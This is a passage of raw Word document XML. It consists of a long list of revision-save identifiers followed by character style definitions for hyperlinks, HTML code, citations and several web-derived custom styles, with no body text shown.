    <w:rsid w:val="45AE1A5B"/>
    <w:rsid w:val="45FF5F00"/>
    <w:rsid w:val="460B7BDF"/>
    <w:rsid w:val="46296596"/>
    <w:rsid w:val="464B6327"/>
    <w:rsid w:val="464E25F1"/>
    <w:rsid w:val="466A07C2"/>
    <w:rsid w:val="468176FA"/>
    <w:rsid w:val="46AA7447"/>
    <w:rsid w:val="472146E1"/>
    <w:rsid w:val="47234B74"/>
    <w:rsid w:val="4759788D"/>
    <w:rsid w:val="476D3876"/>
    <w:rsid w:val="47981C2E"/>
    <w:rsid w:val="479D6B2A"/>
    <w:rsid w:val="47D94AAB"/>
    <w:rsid w:val="47F90DFB"/>
    <w:rsid w:val="48050762"/>
    <w:rsid w:val="480C2E66"/>
    <w:rsid w:val="48322E22"/>
    <w:rsid w:val="485968B2"/>
    <w:rsid w:val="485F6805"/>
    <w:rsid w:val="488E7FF0"/>
    <w:rsid w:val="489E7A48"/>
    <w:rsid w:val="48BA0613"/>
    <w:rsid w:val="48CF2FB7"/>
    <w:rsid w:val="48CF4E7D"/>
    <w:rsid w:val="48E91A24"/>
    <w:rsid w:val="4901255E"/>
    <w:rsid w:val="49121DF3"/>
    <w:rsid w:val="492D7A6E"/>
    <w:rsid w:val="494E22A1"/>
    <w:rsid w:val="49990178"/>
    <w:rsid w:val="49A033FE"/>
    <w:rsid w:val="49B77494"/>
    <w:rsid w:val="49F93335"/>
    <w:rsid w:val="4A0326F2"/>
    <w:rsid w:val="4A105B9B"/>
    <w:rsid w:val="4A120EFA"/>
    <w:rsid w:val="4A20681C"/>
    <w:rsid w:val="4A3214A5"/>
    <w:rsid w:val="4A3E01D7"/>
    <w:rsid w:val="4A5375FA"/>
    <w:rsid w:val="4A9D4B03"/>
    <w:rsid w:val="4AD3400E"/>
    <w:rsid w:val="4ADA4307"/>
    <w:rsid w:val="4B0671BF"/>
    <w:rsid w:val="4B0C1B13"/>
    <w:rsid w:val="4B7B77F2"/>
    <w:rsid w:val="4B913AFA"/>
    <w:rsid w:val="4B924214"/>
    <w:rsid w:val="4B9327A1"/>
    <w:rsid w:val="4BAA0092"/>
    <w:rsid w:val="4BD611DF"/>
    <w:rsid w:val="4BE505D4"/>
    <w:rsid w:val="4BF53D4E"/>
    <w:rsid w:val="4C0A2F6A"/>
    <w:rsid w:val="4C243358"/>
    <w:rsid w:val="4C477BC6"/>
    <w:rsid w:val="4C520ABB"/>
    <w:rsid w:val="4C524E14"/>
    <w:rsid w:val="4C7141BB"/>
    <w:rsid w:val="4C843BEA"/>
    <w:rsid w:val="4C960C2A"/>
    <w:rsid w:val="4C9844F1"/>
    <w:rsid w:val="4CD37E4D"/>
    <w:rsid w:val="4CF10EC2"/>
    <w:rsid w:val="4CF61CC0"/>
    <w:rsid w:val="4CF77BF2"/>
    <w:rsid w:val="4D312330"/>
    <w:rsid w:val="4D325BEA"/>
    <w:rsid w:val="4D3A4042"/>
    <w:rsid w:val="4D4672F0"/>
    <w:rsid w:val="4D4C391A"/>
    <w:rsid w:val="4D6563DB"/>
    <w:rsid w:val="4D695551"/>
    <w:rsid w:val="4D75667A"/>
    <w:rsid w:val="4D7C0F14"/>
    <w:rsid w:val="4D7D7571"/>
    <w:rsid w:val="4D843760"/>
    <w:rsid w:val="4D9D512B"/>
    <w:rsid w:val="4DB969E2"/>
    <w:rsid w:val="4DC314EE"/>
    <w:rsid w:val="4DFF6DB3"/>
    <w:rsid w:val="4E061154"/>
    <w:rsid w:val="4E094768"/>
    <w:rsid w:val="4E5652F5"/>
    <w:rsid w:val="4E5B719A"/>
    <w:rsid w:val="4E656491"/>
    <w:rsid w:val="4E967B22"/>
    <w:rsid w:val="4EAF35A3"/>
    <w:rsid w:val="4EBA5C72"/>
    <w:rsid w:val="4ED81116"/>
    <w:rsid w:val="4EE00B3F"/>
    <w:rsid w:val="4EE770B3"/>
    <w:rsid w:val="4F172FEB"/>
    <w:rsid w:val="4F3A15BE"/>
    <w:rsid w:val="4F402773"/>
    <w:rsid w:val="4F4F4E12"/>
    <w:rsid w:val="4F676806"/>
    <w:rsid w:val="4F817CD7"/>
    <w:rsid w:val="4F9A6327"/>
    <w:rsid w:val="4F9D57EE"/>
    <w:rsid w:val="4FBF6664"/>
    <w:rsid w:val="4FCC3E05"/>
    <w:rsid w:val="4FF617A0"/>
    <w:rsid w:val="50145675"/>
    <w:rsid w:val="501844FB"/>
    <w:rsid w:val="501E5C4F"/>
    <w:rsid w:val="50980306"/>
    <w:rsid w:val="50987EF5"/>
    <w:rsid w:val="50CD764F"/>
    <w:rsid w:val="50D77662"/>
    <w:rsid w:val="50DD2006"/>
    <w:rsid w:val="51046D73"/>
    <w:rsid w:val="5133278A"/>
    <w:rsid w:val="51602009"/>
    <w:rsid w:val="51741E2C"/>
    <w:rsid w:val="518A02C5"/>
    <w:rsid w:val="518E5BE3"/>
    <w:rsid w:val="51900453"/>
    <w:rsid w:val="51966F52"/>
    <w:rsid w:val="51994DD7"/>
    <w:rsid w:val="51A16DC7"/>
    <w:rsid w:val="51A17D3C"/>
    <w:rsid w:val="51C76D43"/>
    <w:rsid w:val="51CD3DC3"/>
    <w:rsid w:val="51E00027"/>
    <w:rsid w:val="5218224D"/>
    <w:rsid w:val="52197391"/>
    <w:rsid w:val="52217ACC"/>
    <w:rsid w:val="52305F2B"/>
    <w:rsid w:val="523B3755"/>
    <w:rsid w:val="52860521"/>
    <w:rsid w:val="528E70F7"/>
    <w:rsid w:val="52A94193"/>
    <w:rsid w:val="52A96623"/>
    <w:rsid w:val="52B531B7"/>
    <w:rsid w:val="52BF25F1"/>
    <w:rsid w:val="52C37A9C"/>
    <w:rsid w:val="52D43156"/>
    <w:rsid w:val="52F978C8"/>
    <w:rsid w:val="531B4FB3"/>
    <w:rsid w:val="532D13B8"/>
    <w:rsid w:val="536345BC"/>
    <w:rsid w:val="538F66B8"/>
    <w:rsid w:val="53B07B50"/>
    <w:rsid w:val="53BC364B"/>
    <w:rsid w:val="53D8001B"/>
    <w:rsid w:val="54035365"/>
    <w:rsid w:val="54176947"/>
    <w:rsid w:val="54361BD1"/>
    <w:rsid w:val="54413197"/>
    <w:rsid w:val="54414054"/>
    <w:rsid w:val="544418DF"/>
    <w:rsid w:val="546011B8"/>
    <w:rsid w:val="54B03D30"/>
    <w:rsid w:val="54B12869"/>
    <w:rsid w:val="54BA376E"/>
    <w:rsid w:val="54C2672C"/>
    <w:rsid w:val="5502667A"/>
    <w:rsid w:val="551340D5"/>
    <w:rsid w:val="555A4124"/>
    <w:rsid w:val="55812117"/>
    <w:rsid w:val="559B6BEE"/>
    <w:rsid w:val="55AA6647"/>
    <w:rsid w:val="55B55D69"/>
    <w:rsid w:val="55C717EE"/>
    <w:rsid w:val="55D3544A"/>
    <w:rsid w:val="55E90E1C"/>
    <w:rsid w:val="55F93B00"/>
    <w:rsid w:val="55FA727F"/>
    <w:rsid w:val="55FB7966"/>
    <w:rsid w:val="561306ED"/>
    <w:rsid w:val="56400280"/>
    <w:rsid w:val="56494E4B"/>
    <w:rsid w:val="564B2EE9"/>
    <w:rsid w:val="565257AD"/>
    <w:rsid w:val="5686205B"/>
    <w:rsid w:val="56AC3390"/>
    <w:rsid w:val="56BD4207"/>
    <w:rsid w:val="56BD4236"/>
    <w:rsid w:val="56F367F2"/>
    <w:rsid w:val="57183627"/>
    <w:rsid w:val="571A0C53"/>
    <w:rsid w:val="574F2C7E"/>
    <w:rsid w:val="578170F8"/>
    <w:rsid w:val="579208D2"/>
    <w:rsid w:val="57CC617E"/>
    <w:rsid w:val="58047224"/>
    <w:rsid w:val="58151F3B"/>
    <w:rsid w:val="583375B7"/>
    <w:rsid w:val="58404EBA"/>
    <w:rsid w:val="58515410"/>
    <w:rsid w:val="58682FAC"/>
    <w:rsid w:val="58A5558F"/>
    <w:rsid w:val="58B36F25"/>
    <w:rsid w:val="58D10DD3"/>
    <w:rsid w:val="58E36EA7"/>
    <w:rsid w:val="590F5772"/>
    <w:rsid w:val="59362D28"/>
    <w:rsid w:val="594C7F00"/>
    <w:rsid w:val="59506DC8"/>
    <w:rsid w:val="59573E4A"/>
    <w:rsid w:val="59797C47"/>
    <w:rsid w:val="59AF297D"/>
    <w:rsid w:val="59B41CA4"/>
    <w:rsid w:val="59B455AD"/>
    <w:rsid w:val="59C70043"/>
    <w:rsid w:val="59E52323"/>
    <w:rsid w:val="5A131E0F"/>
    <w:rsid w:val="5A294E1C"/>
    <w:rsid w:val="5A321EE6"/>
    <w:rsid w:val="5A647790"/>
    <w:rsid w:val="5A6C598D"/>
    <w:rsid w:val="5AC02F46"/>
    <w:rsid w:val="5ACC0B67"/>
    <w:rsid w:val="5AFB013F"/>
    <w:rsid w:val="5B3C7311"/>
    <w:rsid w:val="5B7D579D"/>
    <w:rsid w:val="5B800A62"/>
    <w:rsid w:val="5BBE69E4"/>
    <w:rsid w:val="5C080399"/>
    <w:rsid w:val="5C0B6BBB"/>
    <w:rsid w:val="5C413057"/>
    <w:rsid w:val="5C5A1C95"/>
    <w:rsid w:val="5C7D2B44"/>
    <w:rsid w:val="5C981461"/>
    <w:rsid w:val="5CCE03D9"/>
    <w:rsid w:val="5CDD38E3"/>
    <w:rsid w:val="5CE37EC9"/>
    <w:rsid w:val="5CF63788"/>
    <w:rsid w:val="5CF745D8"/>
    <w:rsid w:val="5D256103"/>
    <w:rsid w:val="5D3316AC"/>
    <w:rsid w:val="5D3A01BE"/>
    <w:rsid w:val="5D41624C"/>
    <w:rsid w:val="5D873340"/>
    <w:rsid w:val="5D8A404F"/>
    <w:rsid w:val="5DA6570A"/>
    <w:rsid w:val="5DA6775E"/>
    <w:rsid w:val="5DAF654E"/>
    <w:rsid w:val="5DB974C4"/>
    <w:rsid w:val="5DCC65D6"/>
    <w:rsid w:val="5E0800D9"/>
    <w:rsid w:val="5E604C6B"/>
    <w:rsid w:val="5E790C25"/>
    <w:rsid w:val="5E7F7C91"/>
    <w:rsid w:val="5EA01942"/>
    <w:rsid w:val="5EA50401"/>
    <w:rsid w:val="5ED64DF7"/>
    <w:rsid w:val="5EF54668"/>
    <w:rsid w:val="5F0360D6"/>
    <w:rsid w:val="5F2D514E"/>
    <w:rsid w:val="5F374536"/>
    <w:rsid w:val="5F48518A"/>
    <w:rsid w:val="5F541BCE"/>
    <w:rsid w:val="5F567BD5"/>
    <w:rsid w:val="5F5C55DE"/>
    <w:rsid w:val="5F6D7A7F"/>
    <w:rsid w:val="5F965111"/>
    <w:rsid w:val="5F986907"/>
    <w:rsid w:val="5FBE7301"/>
    <w:rsid w:val="5FD03BA8"/>
    <w:rsid w:val="5FD96BCD"/>
    <w:rsid w:val="5FE67318"/>
    <w:rsid w:val="5FF328C5"/>
    <w:rsid w:val="60192146"/>
    <w:rsid w:val="603A6C2D"/>
    <w:rsid w:val="60484D49"/>
    <w:rsid w:val="604D4E33"/>
    <w:rsid w:val="6052413D"/>
    <w:rsid w:val="6085029B"/>
    <w:rsid w:val="60945866"/>
    <w:rsid w:val="6097455F"/>
    <w:rsid w:val="60AF5982"/>
    <w:rsid w:val="60D82241"/>
    <w:rsid w:val="60FC1E9D"/>
    <w:rsid w:val="610A5F43"/>
    <w:rsid w:val="6114105A"/>
    <w:rsid w:val="61155507"/>
    <w:rsid w:val="611C5767"/>
    <w:rsid w:val="61384928"/>
    <w:rsid w:val="613C21C9"/>
    <w:rsid w:val="61854E9D"/>
    <w:rsid w:val="61987A41"/>
    <w:rsid w:val="619A1428"/>
    <w:rsid w:val="61A67F1B"/>
    <w:rsid w:val="61B269AB"/>
    <w:rsid w:val="61B421DB"/>
    <w:rsid w:val="61F75A48"/>
    <w:rsid w:val="620C0D5E"/>
    <w:rsid w:val="62275FA8"/>
    <w:rsid w:val="622D0362"/>
    <w:rsid w:val="62547C28"/>
    <w:rsid w:val="625F3A05"/>
    <w:rsid w:val="626937E7"/>
    <w:rsid w:val="626D794B"/>
    <w:rsid w:val="626E67FA"/>
    <w:rsid w:val="627B7E5C"/>
    <w:rsid w:val="62883C1A"/>
    <w:rsid w:val="628E40F5"/>
    <w:rsid w:val="62997C5E"/>
    <w:rsid w:val="629F08A9"/>
    <w:rsid w:val="62E124E7"/>
    <w:rsid w:val="631C075A"/>
    <w:rsid w:val="63210A67"/>
    <w:rsid w:val="63290ED9"/>
    <w:rsid w:val="63367B34"/>
    <w:rsid w:val="63413FFB"/>
    <w:rsid w:val="63875FC8"/>
    <w:rsid w:val="63E07DF9"/>
    <w:rsid w:val="63F3026F"/>
    <w:rsid w:val="63F93871"/>
    <w:rsid w:val="64332B8F"/>
    <w:rsid w:val="64381E0B"/>
    <w:rsid w:val="644D18B9"/>
    <w:rsid w:val="644E3BB8"/>
    <w:rsid w:val="645644BA"/>
    <w:rsid w:val="64594671"/>
    <w:rsid w:val="645A177E"/>
    <w:rsid w:val="647342EB"/>
    <w:rsid w:val="64753097"/>
    <w:rsid w:val="648223E3"/>
    <w:rsid w:val="64EA6FB1"/>
    <w:rsid w:val="650670D9"/>
    <w:rsid w:val="654130A0"/>
    <w:rsid w:val="655F185F"/>
    <w:rsid w:val="659E25E2"/>
    <w:rsid w:val="65B70362"/>
    <w:rsid w:val="65B97FB8"/>
    <w:rsid w:val="65C62557"/>
    <w:rsid w:val="65D67EBA"/>
    <w:rsid w:val="65E06CD0"/>
    <w:rsid w:val="65EC3C7C"/>
    <w:rsid w:val="66133CA7"/>
    <w:rsid w:val="66377EAC"/>
    <w:rsid w:val="663D6C80"/>
    <w:rsid w:val="66447184"/>
    <w:rsid w:val="664C7A5C"/>
    <w:rsid w:val="66524E0C"/>
    <w:rsid w:val="667150AD"/>
    <w:rsid w:val="667375FD"/>
    <w:rsid w:val="66794E38"/>
    <w:rsid w:val="66C24E64"/>
    <w:rsid w:val="67266846"/>
    <w:rsid w:val="674117B5"/>
    <w:rsid w:val="67411FB9"/>
    <w:rsid w:val="675735E0"/>
    <w:rsid w:val="676257F1"/>
    <w:rsid w:val="677E7627"/>
    <w:rsid w:val="679F11B9"/>
    <w:rsid w:val="67CD000A"/>
    <w:rsid w:val="67E10F1A"/>
    <w:rsid w:val="680016AB"/>
    <w:rsid w:val="682E6588"/>
    <w:rsid w:val="68535C10"/>
    <w:rsid w:val="68554453"/>
    <w:rsid w:val="68591A1B"/>
    <w:rsid w:val="68697A0E"/>
    <w:rsid w:val="686A1E8D"/>
    <w:rsid w:val="686C4AE9"/>
    <w:rsid w:val="689969E5"/>
    <w:rsid w:val="68CB0B9D"/>
    <w:rsid w:val="68CB4553"/>
    <w:rsid w:val="68EB6BC6"/>
    <w:rsid w:val="68F50EBB"/>
    <w:rsid w:val="691E2BB9"/>
    <w:rsid w:val="692A5CF9"/>
    <w:rsid w:val="69366368"/>
    <w:rsid w:val="69583588"/>
    <w:rsid w:val="69597ADF"/>
    <w:rsid w:val="699075F8"/>
    <w:rsid w:val="69AA1991"/>
    <w:rsid w:val="69AA38AF"/>
    <w:rsid w:val="69E44BB5"/>
    <w:rsid w:val="69F30AE7"/>
    <w:rsid w:val="69FD221D"/>
    <w:rsid w:val="6A0456CD"/>
    <w:rsid w:val="6A396FE4"/>
    <w:rsid w:val="6A45790E"/>
    <w:rsid w:val="6A7B2B6B"/>
    <w:rsid w:val="6A7E4100"/>
    <w:rsid w:val="6A860961"/>
    <w:rsid w:val="6A864AD6"/>
    <w:rsid w:val="6AA605A1"/>
    <w:rsid w:val="6ABC494A"/>
    <w:rsid w:val="6AEF0C67"/>
    <w:rsid w:val="6AF01C29"/>
    <w:rsid w:val="6AF208EA"/>
    <w:rsid w:val="6B274303"/>
    <w:rsid w:val="6B32480D"/>
    <w:rsid w:val="6B332307"/>
    <w:rsid w:val="6B3938D2"/>
    <w:rsid w:val="6B530BEB"/>
    <w:rsid w:val="6B636251"/>
    <w:rsid w:val="6B780741"/>
    <w:rsid w:val="6B893808"/>
    <w:rsid w:val="6B9F0187"/>
    <w:rsid w:val="6BA42BD3"/>
    <w:rsid w:val="6BE739E1"/>
    <w:rsid w:val="6C331A9D"/>
    <w:rsid w:val="6C386FE3"/>
    <w:rsid w:val="6C5B76C4"/>
    <w:rsid w:val="6C64454C"/>
    <w:rsid w:val="6C77427D"/>
    <w:rsid w:val="6C9F5373"/>
    <w:rsid w:val="6CBC404E"/>
    <w:rsid w:val="6CC15E1B"/>
    <w:rsid w:val="6CCB47B9"/>
    <w:rsid w:val="6CCC3924"/>
    <w:rsid w:val="6CCF0C79"/>
    <w:rsid w:val="6CEB60AB"/>
    <w:rsid w:val="6D354FDE"/>
    <w:rsid w:val="6D392650"/>
    <w:rsid w:val="6D493243"/>
    <w:rsid w:val="6D73336C"/>
    <w:rsid w:val="6DA7173F"/>
    <w:rsid w:val="6DD11F34"/>
    <w:rsid w:val="6DF03F14"/>
    <w:rsid w:val="6E197D7D"/>
    <w:rsid w:val="6E1D0885"/>
    <w:rsid w:val="6E317A94"/>
    <w:rsid w:val="6E366A0D"/>
    <w:rsid w:val="6E4077DD"/>
    <w:rsid w:val="6E481E11"/>
    <w:rsid w:val="6E5F53D0"/>
    <w:rsid w:val="6E7532BD"/>
    <w:rsid w:val="6E8431D2"/>
    <w:rsid w:val="6E8E4D9F"/>
    <w:rsid w:val="6EC1739D"/>
    <w:rsid w:val="6ECC37DD"/>
    <w:rsid w:val="6EDB5E42"/>
    <w:rsid w:val="6EE93996"/>
    <w:rsid w:val="6F2911DF"/>
    <w:rsid w:val="6F415BF0"/>
    <w:rsid w:val="6F54703D"/>
    <w:rsid w:val="6F591849"/>
    <w:rsid w:val="6F62045A"/>
    <w:rsid w:val="6F7B0D7A"/>
    <w:rsid w:val="6F7C042F"/>
    <w:rsid w:val="6F7F2BD4"/>
    <w:rsid w:val="6F843D3F"/>
    <w:rsid w:val="6F926CDB"/>
    <w:rsid w:val="6F985A3D"/>
    <w:rsid w:val="6F9D0A5F"/>
    <w:rsid w:val="6FB80082"/>
    <w:rsid w:val="6FFD5331"/>
    <w:rsid w:val="7012490F"/>
    <w:rsid w:val="70171BEA"/>
    <w:rsid w:val="706A0A05"/>
    <w:rsid w:val="70846B73"/>
    <w:rsid w:val="70A3334B"/>
    <w:rsid w:val="70AA77A2"/>
    <w:rsid w:val="70B96EDB"/>
    <w:rsid w:val="70C05AAC"/>
    <w:rsid w:val="70D572CD"/>
    <w:rsid w:val="70E03D80"/>
    <w:rsid w:val="70F108C2"/>
    <w:rsid w:val="70F24087"/>
    <w:rsid w:val="70F74ECE"/>
    <w:rsid w:val="71132807"/>
    <w:rsid w:val="714036FF"/>
    <w:rsid w:val="716B66EC"/>
    <w:rsid w:val="718E3D1A"/>
    <w:rsid w:val="71974D6A"/>
    <w:rsid w:val="71A04D29"/>
    <w:rsid w:val="71AB0491"/>
    <w:rsid w:val="71B33B2C"/>
    <w:rsid w:val="71BD0BF9"/>
    <w:rsid w:val="71F75AA0"/>
    <w:rsid w:val="72093DCB"/>
    <w:rsid w:val="72265493"/>
    <w:rsid w:val="723E5433"/>
    <w:rsid w:val="72474914"/>
    <w:rsid w:val="72567E5E"/>
    <w:rsid w:val="7279343C"/>
    <w:rsid w:val="727967BA"/>
    <w:rsid w:val="727C1224"/>
    <w:rsid w:val="72927ED4"/>
    <w:rsid w:val="72A15B78"/>
    <w:rsid w:val="72B609E8"/>
    <w:rsid w:val="72DD2049"/>
    <w:rsid w:val="72DF31E7"/>
    <w:rsid w:val="72F31321"/>
    <w:rsid w:val="73227E9A"/>
    <w:rsid w:val="733F1271"/>
    <w:rsid w:val="73BB4155"/>
    <w:rsid w:val="73BD3975"/>
    <w:rsid w:val="73F5138B"/>
    <w:rsid w:val="7409785B"/>
    <w:rsid w:val="74161A91"/>
    <w:rsid w:val="74272F0D"/>
    <w:rsid w:val="743D3E49"/>
    <w:rsid w:val="74402BD6"/>
    <w:rsid w:val="74800D26"/>
    <w:rsid w:val="74AA67D3"/>
    <w:rsid w:val="74B15060"/>
    <w:rsid w:val="75057E83"/>
    <w:rsid w:val="7586641E"/>
    <w:rsid w:val="75A63032"/>
    <w:rsid w:val="75CB3E65"/>
    <w:rsid w:val="75CE3F84"/>
    <w:rsid w:val="75D452F0"/>
    <w:rsid w:val="75E10191"/>
    <w:rsid w:val="760D19BD"/>
    <w:rsid w:val="761C3ACA"/>
    <w:rsid w:val="761E0756"/>
    <w:rsid w:val="76444377"/>
    <w:rsid w:val="76713793"/>
    <w:rsid w:val="767328C3"/>
    <w:rsid w:val="76827E11"/>
    <w:rsid w:val="76910A5E"/>
    <w:rsid w:val="769563E8"/>
    <w:rsid w:val="7699553D"/>
    <w:rsid w:val="76AB4CCD"/>
    <w:rsid w:val="76B3494C"/>
    <w:rsid w:val="76B54071"/>
    <w:rsid w:val="76B8781F"/>
    <w:rsid w:val="76C50DDC"/>
    <w:rsid w:val="76D032D1"/>
    <w:rsid w:val="76E336B1"/>
    <w:rsid w:val="76E73F76"/>
    <w:rsid w:val="771B11BC"/>
    <w:rsid w:val="773413E9"/>
    <w:rsid w:val="773E7F63"/>
    <w:rsid w:val="77557D01"/>
    <w:rsid w:val="775D0629"/>
    <w:rsid w:val="776A4FB6"/>
    <w:rsid w:val="77B201BB"/>
    <w:rsid w:val="77D16DBE"/>
    <w:rsid w:val="77DF3FA3"/>
    <w:rsid w:val="77E42543"/>
    <w:rsid w:val="7810671C"/>
    <w:rsid w:val="78174F50"/>
    <w:rsid w:val="78351C99"/>
    <w:rsid w:val="78557E70"/>
    <w:rsid w:val="78715B1E"/>
    <w:rsid w:val="789213B2"/>
    <w:rsid w:val="78951CD1"/>
    <w:rsid w:val="789758CD"/>
    <w:rsid w:val="78A5378A"/>
    <w:rsid w:val="78A908E5"/>
    <w:rsid w:val="78AD3747"/>
    <w:rsid w:val="78C47874"/>
    <w:rsid w:val="78CE7806"/>
    <w:rsid w:val="78D15207"/>
    <w:rsid w:val="78D972E2"/>
    <w:rsid w:val="78DE64B5"/>
    <w:rsid w:val="78F24E16"/>
    <w:rsid w:val="78F818BF"/>
    <w:rsid w:val="79151274"/>
    <w:rsid w:val="791C570A"/>
    <w:rsid w:val="797812CA"/>
    <w:rsid w:val="7985297B"/>
    <w:rsid w:val="79A73B54"/>
    <w:rsid w:val="79F27647"/>
    <w:rsid w:val="7A002763"/>
    <w:rsid w:val="7A163826"/>
    <w:rsid w:val="7A257C0C"/>
    <w:rsid w:val="7A4B5CE0"/>
    <w:rsid w:val="7A522A2B"/>
    <w:rsid w:val="7A5C2140"/>
    <w:rsid w:val="7AB51C49"/>
    <w:rsid w:val="7AE633BE"/>
    <w:rsid w:val="7AFF3C03"/>
    <w:rsid w:val="7B001397"/>
    <w:rsid w:val="7B560094"/>
    <w:rsid w:val="7B5E4799"/>
    <w:rsid w:val="7B682742"/>
    <w:rsid w:val="7B6D1C5A"/>
    <w:rsid w:val="7B7B1ABF"/>
    <w:rsid w:val="7BA6735A"/>
    <w:rsid w:val="7BBC4027"/>
    <w:rsid w:val="7BE77229"/>
    <w:rsid w:val="7BFD0229"/>
    <w:rsid w:val="7C0509C4"/>
    <w:rsid w:val="7C213E34"/>
    <w:rsid w:val="7C242E9D"/>
    <w:rsid w:val="7C2B01D1"/>
    <w:rsid w:val="7C3D1B9A"/>
    <w:rsid w:val="7C6B46DB"/>
    <w:rsid w:val="7C6D2494"/>
    <w:rsid w:val="7C6D5854"/>
    <w:rsid w:val="7C7D56EB"/>
    <w:rsid w:val="7CD008C3"/>
    <w:rsid w:val="7CDB5245"/>
    <w:rsid w:val="7CE368B9"/>
    <w:rsid w:val="7CF273B6"/>
    <w:rsid w:val="7D150719"/>
    <w:rsid w:val="7D2A0B1F"/>
    <w:rsid w:val="7D2B17E6"/>
    <w:rsid w:val="7D2D408A"/>
    <w:rsid w:val="7D4A16EC"/>
    <w:rsid w:val="7D5119B4"/>
    <w:rsid w:val="7D546F4D"/>
    <w:rsid w:val="7D5B5682"/>
    <w:rsid w:val="7D8B2C1B"/>
    <w:rsid w:val="7DC01DBB"/>
    <w:rsid w:val="7DD127FA"/>
    <w:rsid w:val="7DF4113D"/>
    <w:rsid w:val="7DFD2861"/>
    <w:rsid w:val="7E0475A1"/>
    <w:rsid w:val="7E0D11F1"/>
    <w:rsid w:val="7E414A0A"/>
    <w:rsid w:val="7E480A5A"/>
    <w:rsid w:val="7E6F3003"/>
    <w:rsid w:val="7E72688B"/>
    <w:rsid w:val="7E8B344C"/>
    <w:rsid w:val="7EAA772A"/>
    <w:rsid w:val="7EC254F6"/>
    <w:rsid w:val="7EC9775F"/>
    <w:rsid w:val="7F0D0150"/>
    <w:rsid w:val="7F4268DB"/>
    <w:rsid w:val="7F4E1A35"/>
    <w:rsid w:val="7F582DF5"/>
    <w:rsid w:val="7F645C59"/>
    <w:rsid w:val="7F6D21C4"/>
    <w:rsid w:val="7F840CFC"/>
    <w:rsid w:val="7F8A0777"/>
    <w:rsid w:val="7F9D3D2E"/>
    <w:rsid w:val="7FAC4D0A"/>
    <w:rsid w:val="7FB735F7"/>
    <w:rsid w:val="7FD47FDE"/>
    <w:rsid w:val="7FE06977"/>
    <w:rsid w:val="7FE36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qFormat="1"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HTML Preformatted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/>
      <w:ind w:left="0" w:right="0"/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Normal (Web)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0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0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FollowedHyperlink"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F4F4F"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F4F4F"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="choosed"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="first-child"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="first-child1"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="count"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999AAA"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="count1"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="555666"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="name18"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="555666"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="btn-bar"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:shd w:val="clear" w:fill="CCCCD8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="btn-bar1"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:shd w:val="clear" w:fill="CCCCD8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="quote"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="quote1"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="quote2"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
